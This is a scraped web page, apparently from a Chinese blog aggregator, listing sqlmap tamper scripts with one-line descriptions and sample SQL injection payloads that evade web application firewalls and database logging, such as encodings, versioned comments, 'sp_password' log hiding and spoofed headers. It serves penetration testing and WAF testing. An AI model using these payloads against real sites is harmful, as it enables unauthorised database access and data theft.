SQLMap Tamper Scripts Update 04/July/2016
SQLMap Tamper Scripts Update
apostrophemask.py
Replaces apostrophe character with its UTF-8 full width counterpart
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py
Replaces apostrophe character with its illegal double unicode counterpart
'1 AND %271%27=%271'
appendnullbyte.py
Appends encoded NULL byte character at the end of payload
'1 AND 1=1'
base64encode.py
Base64 all characters in a given payload
'MScgQU5EIFNMRUVQKDUpIw=='
between.py
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
'1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py
Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator
'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py
Double url-encodes all characters in a given payload (not processing already encoded)
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
commalesslimit.py
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
''LIMIT 3 OFFSET 2''
commalessmid.py
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
'MID(VERSION() FROM 1 FOR 1)'
concat2concatws.py
Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
charencode.py
Url-encodes all characters in a given payload (not processing already encoded)
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py
Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
equaltolike.py
Replaces all occurances of operator equal ('=') with operator 'LIKE'
'SELECT * FROM users WHERE id LIKE 1'
escapequotes.py
Slash escape quotes (' and ")
'1\\\\" AND SLEEP(5)#'
greatest.py
Replaces greater than operator ('>') with 'GREATEST' counterpart
'1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py
Adds versioned MySQL comment before each keyword
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
'IF(ISNULL(1),2,1)'
modsecurityversioned.py
Embraces complete query with versioned comment
'1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py
Embraces complete query with zero-versioned comment
'1 /*!00000AND 2>1*/--'
multiplespaces.py
Adds multiple spaces around SQL keywords
'1 UNION SELECT foobar'
nonrecursivereplacement.py
Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
'1 UNIOUNIONN SELESELECTCT 2--'
percentage.py
Adds a percentage sign ('%') infront of each character
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M%T%A%B%L%E'
overlongutf8.py
Converts all characters in a given payload (not processing already encoded)
'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'
randomcase.py
Replaces each keyword character with random case value
'INseRt'
randomcomments.py
Add random comments to SQL keywords
'I/**/N/**/SERT'
securesphere.py
Appends special crafted string
"1 AND 1=1 and '0having'='0having'"
sp_password.py
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
'1 AND 9227=9227-- sp_password'
space2comment.py
Replaces space character (' ') with comments '/**/'
'SELECT/**/id/**/FROM/**/users'
space2dash.py
Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
space2morehash.py
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
space2mssqlblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
'1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
'1--%0AAND--%0A9227=9227'
space2plus.py
Replaces space character (' ') with plus ('+')
'SELECT+id+FROM+users'
space2randomblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
'SELECT%0Did%0DFROM%0Ausers'
symboliclogical.py
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
"1 %26%26 '1'='1"
unionalltounion.py
Replaces UNION ALL SELECT with UNION SELECT
'-1 UNION SELECT'
unmagicquotes.py
Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
'1%bf%27 AND 1=1-- '
uppercase.py
Replaces each keyword character with upper case value
'INSERT'
varnish.py
Append a HTTP header 'X-originating-IP'
http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
versionedkeywords.py
Encloses each non-function keyword with versioned MySQL comment
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
versionedmorekeywords.py
Encloses each keyword with versioned MySQL comment
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py
Append a fake HTTP header 'X-Forwarded-For'
' headers["X-Forwarded-For"]'
SQLMap Tamper Scripts Update 04/July/2016的更多相关文章
- Sqlmap Tamper大全(1)
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...
- 安全工具推荐之sqlmap tamper&sqlmap api
我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...
- sqlmap tamper脚本
本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...
- sqlmap Tamper脚本编写
sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...
- Sqlmap Tamper大全
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...
- sqlmap tamper的使用
前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...
- sqlmap tamper下模块的使用
使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...
- sqlmap tamper编写
#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...
- sqlmap tamper绕过安全狗
可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (ht ...
随机推荐
- 高访问量WEB开发中的架构模式,学习从点滴开始
当一个Web系统从日访问量10万逐步增长到1000万,甚至超过1亿的过程中,Web系统承受的压力会越来越大,在这个过程中,我们会遇到很多的问题.为了解决这些性能压力带来问题,我们需要在Web系统架构 ...
- Spring的IOC和AOP之深剖
今天,既然讲到了Spring 的IOC和AOP,我们就必须要知道 Spring主要是两件事: 1.开发Bean:2.配置Bean.对于Spring框架来说,它要做的,就是根据配置文件来创建bean实例 ...
- Flexible 弹性盒子模型之flex
实例 让所有弹性盒模型对象的子元素都有相同的长度,忽略它们内部的内容: #main div { flex:1; } 复制 效果预览 浏览器支持 表格中的数字表示支持该属性的第一个浏览器的版本号. 紧跟 ...
- xamarin 一般错误解决办法
1. android_m2repository_r错误 问题描述: Unzipping failed. Please download https://dl-ssl.google.com/androi ...
- UITableView cell复用出错问题 页面滑动卡顿问题 & 各杂七杂八问题
UITableView 的cell 复用机制节省了内存,但是有时对于多变的自定义cell,重用时会出现界面出错(例如复用出错,出现cell混乱重影).滑动卡顿等问题,这里只简单敲下几点复用出错时的解决 ...
- java socket传送一个结构体给用C++编写的服务器解析的问题
另一端是Java写客户端程序,两者之间需要通信.c++/c接收和发送的都是结构体,而Java是直接发送的字节流或者byte 数组.解决方法:c++/c socket 在发送结构体的时候其实发送的也是字 ...
- JavaScript线程机制
浏览器的内核是多线程的,它们在内核制控下相互配合以保持同步,一个浏览器至少实现三个常驻线程:JS引擎线程(用于处理JS).GUI渲染线程(用于页面渲染).浏览器事件触发线程(用于控制交互). 除此之外 ...
- 你该知道的-SQL里的这些新语法-函数
前言 最近帮客户做数据库优化的时候发现客户系统使用了很多函数,自己竟然不知道是干啥的,好歹做过好几年开发的我必然不能忍!于是翻了翻资料自己学习了一下随便也分享给群友. 巧用函数的霸气作用———我做开发 ...
- 华为手机浏览器不支持PUT提交方式的解决方案
最近所在技术团队在开发webapp项目,前端angularjs+后端.Net MVC API,API登录接口定义为PUT提交方式,在做兼容测试时发现UC.safari.微信浏览器下都可以登录,但在华为 ...
- Couchbase 环境搭建与使用(C#)
Couchbase Couchbase Server (前身是 Membase) 是一个分布式的面向文档的 NoSQL 数据库管理系统,该系统联合了 CouchDB 的简单和可靠以及 Memcache ...